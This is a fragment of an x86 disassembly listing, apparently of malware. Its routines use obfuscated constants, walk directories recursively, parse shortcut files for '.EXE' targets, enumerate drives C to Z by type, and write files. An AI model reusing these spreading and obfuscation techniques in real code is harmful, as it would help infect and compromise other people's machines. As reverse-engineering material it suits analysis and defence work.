arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call dword ptr ds:10011630h
xor ebx, ebx
inc ebx
push 10013511h
call sub_4228CE
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10011634h
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1000F258h
mov [ebp+var_248], eax
movsx ecx, word ptr ds:100120DCh
add ecx, ds:100120A8h
sub ecx, 8
neg ecx
cmp eax, ecx
jnz loc_41E0F1
mov eax, ds:1001209Ch
sub eax, 8
cmp [ebp+arg_20], eax
ja loc_41E1AE
mov eax, ds:100121A4h
add eax, 3FAh
add eax, ds:10012094h
cmp [ebp+arg_24], eax
jnb short loc_41DF5B
mov eax, ds:1001209Ch
add eax, 9Ch
cmp [ebp+arg_24], eax
jnz loc_41E1AE
loc_41DF5B: ; CODE XREF: sub_41DEB9+8D�j
movsx eax, word ptr ds:10012128h
add eax, 30D40h
cmp [ebp+arg_24], eax
ja loc_41E1AE
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10011780h
mov [ebp+var_260], eax
movsx eax, word ptr ds:10012150h
sub eax, 5
cmp [ebp+var_260], eax
jge short loc_41DFA3
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_41DFAE
; ---------------------------------------------------------------------------
loc_41DFA3: ; CODE XREF: sub_41DEB9+DB�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_41DFAE: ; CODE XREF: sub_41DEB9+E8�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10011778h
mov eax, ds:100121CCh
mov edx, ds:100121B8h
movzx ecx, [ebp+var_24E]
movzx esi, [ebp+var_250]
movsx edi, word ptr ds:10012168h
lea edi, [eax+edi+30h]
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_252]
mov edi, ds:10012158h
lea edi, [edx+edi+15h]
imul esi, edi
mov edi, ds:100121C4h
add edi, 37h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_256]
mov edi, ds:100121CCh
add edi, 1Ah
imul esi, edi
mov edi, ds:10012138h
add edi, 10h
add edi, ds:100121B0h
imul esi, edi
mov edi, ds:1001214Ch
add edi, 36h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_258]
mov edi, ds:10012094h
add edi, 2
add edi, eax
mov eax, esi
imul eax, edi
movsx esi, word ptr ds:10012100h
movsx edi, word ptr ds:10012180h
lea esi, [esi+edi+0Fh]
imul eax, esi
mov esi, ds:100120ACh
add esi, 0Dh
add esi, ds:1001209Ch
imul eax, esi
movsx esi, word ptr ds:10012110h
lea edx, [edx+esi+35h]
imul eax, edx
mov edx, ecx
add edx, eax
mov [ebp+var_25C], edx
mov eax, edx
mov edx, ds:1000C024h
cmp eax, edx
ja loc_41E1AE
sub edx, eax
mov eax, ds:10012178h
add eax, 0Ah
add eax, ds:1001210Ch
cmp edx, eax
jnb loc_41E1AE
mov eax, ds:100120E4h
add eax, 0A2h
cmp [ebp+arg_24], eax
jz short loc_41E0DF
push 0
push [ebp+arg_0]
call sub_4232A3
add esp, 8
jmp loc_41E1AE
; ---------------------------------------------------------------------------
loc_41E0DF: ; CODE XREF: sub_41DEB9+212�j
push 1
push [ebp+arg_0]
call sub_4232A3
add esp, 8
jmp loc_41E1AE
; ---------------------------------------------------------------------------
loc_41E0F1: ; CODE XREF: sub_41DEB9+63�j
cmp [ebp+var_112], 2Eh
jz loc_41E1AA
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push 1001350Bh
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41DEB9
add esp, 154h
jmp short loc_41E1AA
; ---------------------------------------------------------------------------
loc_41E144: ; CODE XREF: sub_41DEB9+2F3�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000D004h
mov ebx, eax
or ebx, ebx
jz short loc_41E1AE
cmp [ebp+var_112], 2Eh
jz short loc_41E1AA
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push 1001350Bh
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_41DEB9
add esp, 154h
loc_41E1AA: ; CODE XREF: sub_41DEB9+23F�j
; sub_41DEB9+289�j ...
or ebx, ebx
jnz short loc_41E144
loc_41E1AE: ; CODE XREF: sub_41DEB9+74�j
; sub_41DEB9+9C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41DEB9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100120C4h
sub eax, 4
cmp ds:10011784h, eax
jbe short loc_41E1D1
push 10011784h
call dword ptr ds:1000C010h
loc_41E1D1: ; CODE XREF: .data:0041E1C4�j
mov eax, ds:10011784h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1DA proc near ; CODE XREF: sub_41C797+2E1�p
; sub_41C797+3C9�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, ds:10012098h
sub edi, 7
cmp edx, edi
jnz short loc_41E1FE
mov eax, [ebp+arg_0]
jmp short loc_41E218
; ---------------------------------------------------------------------------
loc_41E1FE: ; CODE XREF: sub_41E1DA+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_41E218: ; CODE XREF: sub_41E1DA+22�j
pop edi
pop esi
leave
retn
sub_41E1DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E21C proc near ; CODE XREF: sub_4232A3+499�p
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_41C3F2
push 10013506h
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 100134FEh
call sub_4228CE
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
movsx eax, word ptr ds:100121A8h
add eax, ds:10012158h
mov dl, [ebp+arg_0]
mov [ebp+eax+var_267], dl
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:10012100h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 0Ah
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, ds:100121C8h
dec eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call dword ptr ds:10011B8Ch
push edi
call dword ptr ds:10010650h
pop edi
pop esi
leave
retn
sub_41E21C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2FF proc near ; CODE XREF: sub_423CF4+179�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_424F4D
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_424F6D
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_41E327: ; CODE XREF: sub_41E2FF+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E327
mov ebx, ds:10012184h
add ebx, ds:100120CCh
sub ebx, 6
mov esi, eax
sub esi, ebx
mov ebx, ds:100121A0h
sub ebx, 6
mov [ebp+esi+var_12104], bl
push 0
mov eax, ds:1001215Ch
movsx edx, word ptr ds:10012100h
add eax, edx
sub eax, 0Dh
push eax
push 3
push 0
mov eax, ds:1001217Ch
movsx edx, word ptr ds:10012148h
add eax, edx
sub eax, 9
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_41E5D4
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call dword ptr ds:1000C028h
mov [ebp+var_12108], eax
push edi
call dword ptr ds:10010650h
movsx eax, word ptr ds:100121A8h
movsx edx, word ptr ds:100120BCh
add eax, edx
sub eax, 9
cmp [ebp+var_12108], eax
jz loc_41E5D4
cmp [ebp+var_1FFF], 4Ch
jnz loc_41E5D4
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
mov edx, ds:100120F0h
add edx, 46h
movsx ecx, word ptr ds:10012114h
add edx, ecx
add eax, edx
movsx edx, word ptr ds:100120D0h
add edx, 2
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001217Ch
sub edx, 6
cmp eax, edx
jz loc_41E5D4
movzx eax, [ebp+var_12000]
mov edx, ds:100120A0h
add edx, 4
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, ds:1001215Ch
sub edx, 3
cmp eax, edx
jnz loc_41E5D4
movzx eax, [ebp+var_12000]
movsx edx, word ptr ds:100120F4h
mov ecx, ds:100120D4h
lea edx, [edx+ecx+6]
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
mov esi, ds:10012094h
add esi, 0Ah
add esi, ds:100121B4h
mov ebx, eax
add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_424F6D
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_41E502: ; CODE XREF: sub_41E2FF+208�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E502
mov edi, eax
mov eax, ds:100120ACh
add eax, 1
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_41E599
mov eax, ds:100120ECh
add eax, ds:100121C0h
sub eax, 5
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_41E599
mov esi, ds:10012190h
sub esi, 1
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 58h
jnz short loc_41E599
movsx esi, word ptr ds:100120B0h
add esi, ds:100120A4h
sub esi, 9
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jz short loc_41E59B
loc_41E599: ; CODE XREF: sub_41E2FF+220�j
; sub_41E2FF+249�j ...
jmp short loc_41E5D4
; ---------------------------------------------------------------------------
loc_41E59B: ; CODE XREF: sub_41E2FF+298�j
push 100134F9h
call sub_4228CE
push eax
lea edi, [ebp+var_11FFE]
push edi
call dword ptr ds:1000C020h
mov eax, ds:10012190h
movsx edx, word ptr ds:100121BCh
add eax, edx
sub eax, 9
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_422E53
add esp, 14h
loc_41E5D4: ; CODE XREF: sub_41E2FF+93�j
; sub_41E2FF+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41E2FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E5D9 proc near ; CODE XREF: sub_41B939+22E�p
; sub_4223D9+192�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, ds:100120A0h
add edi, 1Bh
mov eax, esi
test eax, eax
jge short loc_41E5FA
add eax, 0FFh
loc_41E5FA: ; CODE XREF: sub_41E5D9+1A�j
sar eax, 8
movsx ebx, word ptr ds:10012194h
add ebx, 9
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, ds:10012174h
add edi, 0Ch
mov eax, esi
test eax, eax
jge short loc_41E625
add eax, 0FFh
loc_41E625: ; CODE XREF: sub_41E5D9+45�j
sar eax, 8
movsx ebx, word ptr ds:100121BCh
add ebx, 0Bh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
movsx edi, word ptr ds:1001219Ch
mov ebx, ds:100120ACh
lea edi, [edi+ebx+18h]
mov eax, esi
test eax, eax
jge short loc_41E658
add eax, 0FFFFh
loc_41E658: ; CODE XREF: sub_41E5D9+78�j
sar eax, 10h
mov ebx, ds:10012140h
add ebx, 0Fh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_42142D
mov ebx, eax
mov [ebp+var_1], bl
mov eax, ds:100120FCh
add eax, 5
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_42063C
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_42142D
mov ebx, eax
mov [ebp+var_12], bl
mov eax, ds:100121CCh
add eax, 6Ah
add eax, ds:100120A8h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_42063C
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_42142D
mov ebx, eax
mov [ebp+var_14], bl
mov eax, ds:100121CCh
add eax, 2Bh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_42063C
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_42142D
mov ebx, eax
mov [ebp+var_16], bl
mov eax, ds:100121A4h
add eax, 49h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_42063C
mov ebx, eax
mov [ebp+var_17], bl
mov eax, ds:1001214Ch
add eax, 3Dh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_42142D
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, ds:10012188h
add esi, 2
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_41E7CE
push 100134DFh
call sub_4228CE
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
add esp, 30h
jmp short loc_41E812
; ---------------------------------------------------------------------------
loc_41E7CE: ; CODE XREF: sub_41E5D9+1AD�j
push 100134C4h
call sub_4228CE
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
add esp, 30h
loc_41E812: ; CODE XREF: sub_41E5D9+1F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E5D9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+8]
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:10012174h
inc eax
cmp ds:1000E61Ch, eax
jnb short loc_41E845
movsx eax, word ptr ds:1001216Ch
sub eax, 4
mov ds:1000E61Ch, eax
loc_41E845: ; CODE XREF: .data:0041E834�j
mov edi, ds:100120ACh
sub edi, 3
jmp short loc_41E85C
; ---------------------------------------------------------------------------
loc_41E850: ; CODE XREF: .data:0041E868�j
lea ebx, ds:1000D130h[edi*4]
cmp esi, ebx
jz short loc_41E86A
inc edi
loc_41E85C: ; CODE XREF: .data:0041E84E�j
mov eax, ds:10012108h
add eax, 3E8h
cmp edi, eax
jb short loc_41E850
loc_41E86A: ; CODE XREF: .data:0041E859�j
movsx eax, word ptr ds:10012114h
add eax, 3E6h
cmp edi, eax
jnz short loc_41E881
xor eax, eax
jmp loc_41E9DB
; ---------------------------------------------------------------------------
loc_41E881: ; CODE XREF: .data:0041E878�j
movzx esi, word ptr ds:1000EA50h[edi*2]
movsx ebx, word ptr ds:100120D0h
inc ebx
cmp esi, ebx
jnz short loc_41E8BC
movzx eax, byte ptr ds:1000E200h[edi]
push eax
push dword ptr ds:1000C060h[edi*4]
call sub_41B66D
add esp, 8
and dword ptr ds:1000D130h[edi*4], 0
xor eax, eax
jmp loc_41E9DB
; ---------------------------------------------------------------------------
loc_41E8BC: ; CODE XREF: .data:0041E893�j
movzx esi, word ptr ds:1000EA50h[edi*2]
movsx ebx, word ptr ds:100120E8h
movsx edx, word ptr ds:10012114h
lea ebx, [ebx+edx+0FFF8h]
cmp esi, ebx
jnz loc_41E9B5
mov eax, ds:10012198h
sub eax, 8
mov [ebp-4], eax
jmp loc_41E998
; ---------------------------------------------------------------------------
loc_41E8F1: ; CODE XREF: .data:0041E9AB�j
mov esi, [ebp-4]
mov ebx, esi
shl ebx, 2
cmp dword ptr ds:1000D130h[ebx], 0
jz loc_41E995
movzx edx, word ptr ds:1000EA50h[esi*2]
movsx ecx, word ptr ds:100121A8h
mov eax, ds:100120B8h
lea ecx, [ecx+eax+0FFFBh]
cmp edx, ecx
jz short loc_41E995
mov edx, ds:1000C060h[edi*4]
cmp ds:1000C060h[ebx], edx
jnz short loc_41E995
mov bl, ds:1000E200h[esi]
cmp bl, ds:1000E200h[edi]
jnz short loc_41E995
movzx esi, word ptr ds:1000EA50h[esi*2]
mov ebx, ds:10012118h
add ebx, ds:10012184h
sub ebx, 6
cmp esi, ebx
jnz short loc_41E986
mov esi, [ebp-4]
movzx ebx, byte ptr ds:1000E200h[esi]
push ebx
push dword ptr ds:1000C060h[esi*4]
call sub_41B66D
add esp, 8
and dword ptr ds:1000D130h[edi*4], 0
jmp short loc_41E9B1
; ---------------------------------------------------------------------------
loc_41E986: ; CODE XREF: .data:0041E95F�j
mov esi, [ebp-4]
lea esi, ds:1000EA50h[esi*2]
dec word ptr [esi]
jmp short loc_41E9B1
; ---------------------------------------------------------------------------
loc_41E995: ; CODE XREF: .data:0041E901�j
; .data:0041E924�j ...
inc dword ptr [ebp-4]
loc_41E998: ; CODE XREF: .data:0041E8EC�j
mov eax, ds:10012178h
add eax, 3E0h
add eax, ds:1001212Ch
cmp [ebp-4], eax
jb loc_41E8F1
loc_41E9B1: ; CODE XREF: .data:0041E984�j
; .data:0041E993�j
xor eax, eax
jmp short loc_41E9DB
; ---------------------------------------------------------------------------
loc_41E9B5: ; CODE XREF: .data:0041E8DB�j
movzx esi, word ptr ds:1000EA50h[edi*2]
movsx ebx, word ptr ds:10012150h
add ebx, ds:100121CCh
sub ebx, 8
cmp esi, ebx
jle short loc_41E9D9
dec word ptr ds:1000EA50h[edi*2]
loc_41E9D9: ; CODE XREF: .data:0041E9CF�j
xor eax, eax
loc_41E9DB: ; CODE XREF: .data:0041E87C�j
; .data:0041E8B7�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E9E2 proc near ; CODE XREF: sub_423996+19B�p
; sub_423996+1BC�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call dword ptr ds:10011770h
mov [ebp+var_8], eax
mov esi, ds:10012124h
dec esi
jmp short loc_41EA3F
; ---------------------------------------------------------------------------
loc_41EA00: ; CODE XREF: sub_41E9E2+6F�j
cmp dword ptr ds:1000D130h[esi*4], 0
jz short loc_41EA3E
mov edx, ds:10010660h[esi*4]
movsx ecx, word ptr ds:10012180h
add ecx, 0EA5Ah
mov eax, ds:10012138h
add eax, ds:100120ECh
sub eax, 8
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_41EA3E
and dword ptr ds:1000D130h[esi*4], 0
loc_41EA3E: ; CODE XREF: sub_41E9E2+26�j
; sub_41E9E2+52�j
inc esi
loc_41EA3F: ; CODE XREF: sub_41E9E2+1C�j
mov eax, ds:100120A8h
add eax, 3E4h
add eax, ds:100120D4h
cmp esi, eax
jb short loc_41EA00
loc_41EA53: ; CODE XREF: sub_41E9E2+94�j
; sub_41E9E2+266�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_41EC4E
movsx eax, word ptr ds:100120E0h
add eax, 4
cmp [ebp+var_14], eax
ja short loc_41EA53
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_41EA7D: ; CODE XREF: sub_41E9E2+A0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41EA7D
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
mov edx, ds:1001210Ch
sub edx, 3
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
movsx eax, word ptr ds:100120E0h
movsx edx, word ptr ds:1001219Ch
add eax, edx
sub eax, 6
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_41EABB
mov [ebp+var_1], 43h
loc_41EABB: ; CODE XREF: sub_41E9E2+D3�j
mov edi, ds:10012138h
sub edi, 8
jmp short loc_41EAED
; ---------------------------------------------------------------------------
loc_41EAC6: ; CODE XREF: sub_41E9E2+120�j
cmp dword ptr ds:1000D130h[edi*4], 0
jz short loc_41EAEC
mov edx, [ebp+var_C]
cmp ds:1000C060h[edi*4], edx
jnz short loc_41EAEC
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_1]
jz loc_41EC32
loc_41EAEC: ; CODE XREF: sub_41E9E2+EC�j
; sub_41E9E2+F8�j
inc edi
loc_41EAED: ; CODE XREF: sub_41E9E2+E2�j
mov eax, ds:10012130h
add eax, 3E4h
movsx edx, word ptr ds:10012110h
add eax, edx
cmp edi, eax
jb short loc_41EAC6
mov eax, ds:1001213Ch
add eax, 3BEh
cmp [ebp+var_10], eax
jbe loc_41EBE4
mov eax, ds:100121B0h
add eax, 9
movsx edx, word ptr ds:10012180h
add eax, edx
push eax
lea eax, [ebp+var_4F]
push eax
call sub_422857
add esp, 8
mov eax, ds:100120F8h
add eax, 3B5h
movsx edx, word ptr ds:10012100h
add eax, edx
mov [ebp+var_18], eax
movsx eax, word ptr ds:100120BCh
sub eax, 9
mov [ebp+var_1C], eax
loc_41EB58: ; CODE XREF: sub_41E9E2+1FD�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
mov edx, ds:1001213Ch
add edx, ds:1001212Ch
sub edx, 7
mov [ebx+eax], dl
push 1000D020h
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov eax, ds:10012178h
add eax, ds:10012198h
sub eax, 0Bh
and eax, 0FFh
push eax
call sub_41DCB0
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, ds:10012094h
add eax, 3B7h
add eax, ds:100121C0h
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_41EBD7
mov [ebp+var_18], eax
loc_41EBD7: ; CODE XREF: sub_41E9E2+1F0�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_41EC2D
jmp loc_41EB58
; ---------------------------------------------------------------------------
loc_41EBE4: ; CODE XREF: sub_41E9E2+12F�j
push 100134BFh
call sub_4228CE
push 1000D020h
push [ebp+var_10]
movsx edx, word ptr ds:10012110h
add edx, ds:10012184h
sub edx, 0Ah
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx edx, word ptr ds:100120C8h
sub edx, 7
and edx, 0FFh
push edx
call sub_41DCB0
add esp, 28h
loc_41EC2D: ; CODE XREF: sub_41E9E2+1FB�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_41EC32: ; CODE XREF: sub_41E9E2+104�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
movsx edx, word ptr ds:10012180h
add edx, 0Eh
cmp [eax], edx
jbe loc_41EA53
loc_41EC4E: ; CODE XREF: sub_41E9E2+81�j
push 100134BBh
call sub_4228CE
push 1000D020h
mov edx, ds:100120ECh
sub edx, 5
push edx
mov edx, ds:100120F0h
add edx, ds:1001214Ch
sub edx, 0Ah
push edx
push eax
mov edx, ds:100120B4h
sub edx, 8
push edx
push 0
push 0
push [ebp+arg_8]
mov edx, ds:10012164h
movsx ecx, word ptr ds:100120D8h
add edx, ecx
sub edx, 4
and edx, 0FFh
push edx
call sub_41DCB0
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_41E9E2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_41ECC8
; ---------------------------------------------------------------------------
loc_41ECBF: ; CODE XREF: .data:0041ECCB�j
and dword ptr ds:10011790h[esi*4], 0
inc esi
loc_41ECC8: ; CODE XREF: .data:0041ECBD�j
cmp esi, 5Ah
jbe short loc_41ECBF
loc_41ECCD: ; CODE XREF: .data:0041EE4A�j
mov edi, 43h
jmp loc_41EE2F
; ---------------------------------------------------------------------------
loc_41ECD7: ; CODE XREF: .data:0041EE32�j
movsx eax, word ptr ds:10012128h
add eax, ds:100121C0h
sub eax, 3
push eax
call dword ptr ds:10011630h
push 100134B3h
call sub_4228CE
push edi
push eax
lea ebx, [ebp-0Eh]
push ebx
call dword ptr ds:10011634h
add esp, 14h
cmp dword ptr ds:10011790h[edi*4], 0
jz short loc_41ED51
mov eax, ds:10012140h
add eax, ds:10012184h
sub eax, 0Eh
mov [ebp-14h], eax
lea eax, [ebp-14h]
push eax
push dword ptr ds:10011790h[edi*4]
call dword ptr ds:1001164Ch
cmp dword ptr [ebp-14h], 103h
jz short loc_41ED51
push dword ptr ds:10011790h[edi*4]
call dword ptr ds:10010650h
and dword ptr ds:10011790h[edi*4], 0
loc_41ED51: ; CODE XREF: .data:0041ED0F�j
; .data:0041ED3A�j
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10011664h
mov [ebp-4], eax
cmp eax, 3
jz short loc_41ED9A
cmp eax, 4
jz short loc_41ED9A
cmp eax, 2
jz short loc_41ED9A
cmp dword ptr ds:10011790h[edi*4], 0
jz loc_41EE2E
movsx ebx, word ptr ds:100121BCh
movsx edx, word ptr ds:1001219Ch
add ebx, edx
sub ebx, 0Ch
mov ds:1000E630h[edi*4], ebx
jmp loc_41EE2E
; ---------------------------------------------------------------------------
loc_41ED9A: ; CODE XREF: .data:0041ED61�j
; .data:0041ED66�j ...
push 1
